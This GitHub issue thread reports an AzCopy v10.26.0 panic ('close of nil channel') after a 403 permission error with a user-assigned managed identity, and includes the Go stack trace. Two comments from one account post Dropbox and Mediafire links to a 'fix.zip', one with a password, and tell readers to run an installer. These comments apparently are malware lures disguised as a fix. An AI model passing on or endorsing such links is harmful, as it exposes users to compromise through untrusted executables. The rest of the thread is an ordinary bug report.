### ISSUE TITLE
Panic error in using user-managed identity

### ISSUE THREAD

**Issue by umagnus** [Azure/azure-storage-azcopy#2789]
##### Note: The version is visible when running AzCopy without any argument
azcopy v10.26.0
### Which platform are you using? (ex: Windows, Mac, Linux)
linux
##### Note: Please remove the SAS to avoid exposing your credentials. If you cannot remember the exact command, please retrieve it from the beginning of the log file.
azcopy copy <srcPath> <dstPath> --recursive --check-length=false --s2s-preserve-access-tier=false
### What problem was encountered?
We use azcopy in csi volume cloning feature and get a panic error in e2e test: https://prow.k8s.io/view/gs/kubernetes-jenkins/pr-logs/pull/kubernetes-sigs_blob-csi-driver/1551/pull-blob-csi-driver-e2e/1825524122587762688
In this case, we use user-assigned managed identity and get error:
```
 exit status 2, output: INFO: Scanning...
  INFO: Login with identity succeeded.
  INFO: Authenticating to destination using Azure AD
  INFO: Authenticating to source using Azure AD
  INFO: Any empty folders will not be processed, because source and/or destination doesn't have full folder support

  Job 593e0c6a-37e3-3043-4235-199d5bec421c has started
  Log file is located at: /root/.azcopy/593e0c6a-37e3-3043-4235-199d5bec421c.log

  INFO: Authentication failed, it is either not correct, or expired, or does not have the correct permission PUT https://fuse18ef57d1190249f99f9.blob.core.windows.net/pvc-edbd9da6-10ce-4b03-b37c-9b90d9e8f7e1/data
  --------------------------------------------------------------------------------
  RESPONSE 403: 403 This request is not authorized to perform this operation using this permission.
  ERROR CODE: AuthorizationPermissionMismatch
  --------------------------------------------------------------------------------
  ﻿<?xml version="1.0" encoding="utf-8"?><Error><Code>AuthorizationPermissionMismatch</Code><Message>This request is not authorized to perform this operation using this permission.
  RequestId:6e28f32d-601e-005e-7041-f24c71000000
  Time:2024-08-19T14:10:42.2594362Z</Message></Error>
  --------------------------------------------------------------------------------

  panic: close of nil channel

  goroutine 149 [running]:
  github.com/Azure/azure-storage-azcopy/v10/ste.(*jobMgr).reportJobPartDoneHandler(0xc000519508)
  	/mnt/vss/_work/1/s/ste/mgr-JobMgr.go:718 +0x327
  created by github.com/Azure/azure-storage-azcopy/v10/ste.NewJobMgr in goroutine 1
  	/mnt/vss/_work/1/s/ste/mgr-JobMgr.go:203 +0xc88
```
However we don't have log file because this is an e2e test, but we found the panic code is here `jm.jstm.xferDone`:
https://github.com/Azure/azure-storage-azcopy/blob/6413253a6e11c925656ddc05f98f28e57c670bfa/ste/mgr-JobMgr.go#L718
### How can we reproduce the problem in the simplest way?
Can we add a check in the code to fix this panic? Thanks

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by umagnus** [comment]
This error only occurred in blob now, and we don't find same issue on file. Is this issue only in blob?
